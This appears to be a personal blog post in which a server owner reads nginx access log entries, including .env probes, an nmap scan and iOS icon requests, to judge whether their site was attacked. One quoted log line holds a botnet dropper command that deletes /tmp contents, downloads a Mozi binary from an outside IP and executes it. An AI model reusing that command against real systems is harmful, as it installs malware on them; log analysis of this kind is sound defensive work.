vulnerability scanning techniques

🏠

/var/log/nginx/access.log

The nginx access log don't show anything too wildly interesting, but let's go through some of the entries at that time:

1 35.222.157.169 - - [25/Sep/2020:21:08:38 +0000] "GET /robots.txt HTTP/1.1" 301 194 "-" "shopify-partner-homepage-scraper"
2 35.222.157.169 - - [25/Sep/2020:21:08:39 +0000] "GET /robots.txt HTTP/1.1" 200 22 "-" "shopify-partner-homepage-scraper"
3 35.222.157.169 - - [25/Sep/2020:21:08:39 +0000] "GET / HTTP/1.1" 301 194 "-" "shopify-partner-homepage-scraper"
4 35.222.157.169 - - [25/Sep/2020:21:08:40 +0000] "GET / HTTP/1.1" 200 527 "-" "shopify-partner-homepage-scraper"

shopify-partner-homepage-scraper seems innocuous enough, though the information regarding it is scant at best. If i had to put an opsec tinfoil hat on, the first step hackers trying to intrude a webserver would take is information gathering, and scraping for files containing usernames, and any information relating to third party applications such as shopify would provide possible intrusion vectors.

But that's really simply because i have my opsec tinfoil hat on. As this server-log for ysolutions.at shows, shopify-parner-homepage-scraper represents 1.34% of their total traffic. So this shopify bot randomly trawling the internet for shopify sites is also likely, but this entry is still noteworthy.

1 83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "GET / HTTP/1.1" 301 194 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
2 83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "GET / HTTP/1.1" 200 527 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
3 83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /favicon.ico HTTP/1.1" 301 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
4 83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /favicon.ico HTTP/1.1" 404 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
5 83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /apple-touch-icon.png HTTP/1.1" 301 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
6 83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /apple-touch-icon.png HTTP/1.1" 405 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
7 83.135.136.179 - - [25/Sep/2020:21:49:56 +0000] "HEAD /apple-touch-icon-precomposed.png HTTP/1.1" 301 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"
8 83.135.136.179 - - [25/Sep/2020:21:49:57 +0000] "HEAD /apple-touch-icon-precomposed.png HTTP/1.1" 405 0 "-" "Reeder/4020.79.01 CFNetwork/1197 Darwin/20.0.0"

The above entries are strange! They occured exactly at the time of the IP attack. The useragent is CFNetwork/1197 Darwin/20.0.0. This is the UA for Darwin 20.0.0 June 22, 2020 macOS Big Sur iOS 14 macOS 11.0 beta 1 and iOS 14.0 beta 1 source. This is neither the version running on my macbook, ipad, or iphone.

This is a scan for the IOS Homescreen which is obviously phishing for a vulnerability of sorts. Even i haven't added either of these sites to my IOS homescreen.

1 66.42.42.3 - - [25/Sep/2020:21:53:34 +0000] "GET /.env HTTP/1.1" 401 606 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
2 66.42.42.3 - - [25/Sep/2020:21:53:35 +0000] "POST / HTTP/1.1" 401 606 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

A get request for a .env is becoming highly suspicious. Basically trying to get information about my environment variables, in case my site is running from my home directory.

1 172.105.89.161 - - [25/Sep/2020:22:02:46 +0000] "POST /ajax HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36"

Here we have an obvious spam abuse entry, from a known spammy IP address.

1 119.185.231.105 - - [25/Sep/2020:22:04:06 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.185.231.105:56819/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 178 "-" "Hello, world"

Here we have an attempt to run a shell command via a get request? Doing an rm -rf in my /tmp/ folder with UA "hello world". It could be entries like this one that triggered my webhost to filter the requests.

1 47.92.204.164 - - [25/Sep/2020:22:07:30 +0000] "GET / HTTP/1.0" 200 6289 "-" "-"
2 47.92.204.164 - - [25/Sep/2020:22:07:37 +0000] "GET /nmaplowercheck1601071656 HTTP/1.1" 400 280 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
3 47.92.204.164 - - [25/Sep/2020:22:07:37 +0000] "GET / HTTP/1.0" 400 280 "-" "-"
4 47.92.204.164 - - [25/Sep/2020:22:07:38 +0000] "GET / HTTP/1.1" 200 6289 "-" "-"
5 47.92.204.164 - - [25/Sep/2020:22:07:51 +0000] "GET / HTTP/1.1" 200 2130 "-" "-"

Here we have an IP scanning my host with nmap. An abusive chinese IP.


So the next logical question to ask, before being able to ascertain whether i'm under attack, is to ask is how common are these requests? My access logs only go back 12 days:

nginx access log do not show anything too suspicious, besides 83.135.136.179

I'm having a hard time tuning into any signal, mostly seems like noise. So i'll have to really focus on the address accessing my site at the exact time of the attack: 83.135.136.179. The IP belongs to 1&1 Versatel Deutschland GmbH, whose headquarters are based in Berlin.